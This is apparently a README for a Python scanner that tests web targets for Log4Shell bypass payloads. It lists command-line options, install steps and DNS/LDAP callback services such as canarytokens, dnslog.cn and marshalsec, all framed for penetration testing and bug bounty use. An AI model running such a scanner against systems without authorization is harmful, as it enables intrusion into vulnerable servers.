This script enables you to easily test for all of the Log4J bypass methods.
This script was created for ETHICAL usage only. Ethical uses include testing your own software, testing software in a penetration test, testing software in a bug bounty, testing purposefully vulnerable software either independently or in an educational setting, or testing software with consent by the creator. Be Hackers with Halos and only use this for ethical purposes. I am not liable for any damage you cause with this software and you are encouraged to look at the source code to understand how it works before using it. You are not permitted to use this software for illegal or cyberwarfare purposes.
# If you are running this program through the BlackArch repo, you can run it from any directory using 'log4j-bypass' instead of 'bypass.py'
usage: bypass.py [-h] [-u URL] [-p PROXY] [-l USEDLIST] [-w WAIT_TIME]
[-c CUSTOM_DNS_CALLBACK_HOST] [-t THREADS]
options:
-h, --help show this help message and exit
-u URL, --url URL Check a single URL.
-p PROXY, --proxy PROXY
send requests through proxy
-l USEDLIST, --list USEDLIST
Check a list of URLs.
-w WAIT_TIME, --wait-time WAIT_TIME
Wait time after all URLs are processed (in seconds) -
[Default: 60].
-c CUSTOM_DNS_CALLBACK_HOST, --callback-url CUSTOM_DNS_CALLBACK_HOST
Custom DNS Callback Host.
-t THREADS, --threads THREADS
Num threads for concurrent scanning - [Default: 2].
This program is preinstalled on BlackArch Linux in the blackarch repo, so if you are using Arch Linux, install the blackarch repo and then run sudo pacman -Syu log4j-bypass
Otherwise, install it using the instructions below.
# You must have git and python3 installed to use this code
git clone https://github.com/cyberqueen-meg/log4j-bypass.git
cd log4j-bypass
chmod 777 bypass.py
python3 bypass.py -h
To use this, you may want to set up a CanaryToken to save the DNS hit results and have them as a cleaner interface. To do so, go to https://canarytokens.org/generate#, select the Log4Shell token, and put the generated token into the program after the --callback-url
tag when executing the script. You can also use other services such as http://dnslog.cn or your own hosted server setup through a utility such as marshalsec (https://github.com/mbechler/marshalsec), OpenLDAP, or similar resources. If you want to host your own server for this, check out the free TryHackMe room created by John Hammond that walks you through setting up the servers to exploit log4j at https://tryhackme.com/room/solar. You need to set up one of these though.
Email me at cyberqueenmeg@wearehackerone with any questions you have and feel free to fork this repo for your own use or contribute! I'll do my best to keep it updated with new bypasses but I might miss one so please contribute if you find a new bypass :D
Special thanks to https://github.com/fullhunt/log4j-scan for inspiring the majority of this code! This is a fork of their project modified to include more details and make it easier to test all the bypasses and new versions.
Special thanks to https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words for providing lots of the bypasses I included in the bypass_payloads array
Special thanks to @noptrix for adding multithreading support and helping me get this software in the BlackArch repo!
Special thanks to @christian-taillon for providing his log4j threat hunting repo which I used to get the new regex bypasses!
This program won an award! Thanks to https://github.com/bugbountyhunters for awarding this program 2nd place in their bug bounty tool competition!
Thank you to all of the defenders, penetration testers, bug bounty hunters, and threat hunters who are actively trying to find and patch this vulnerability and who are sharing information and fixes that they have found.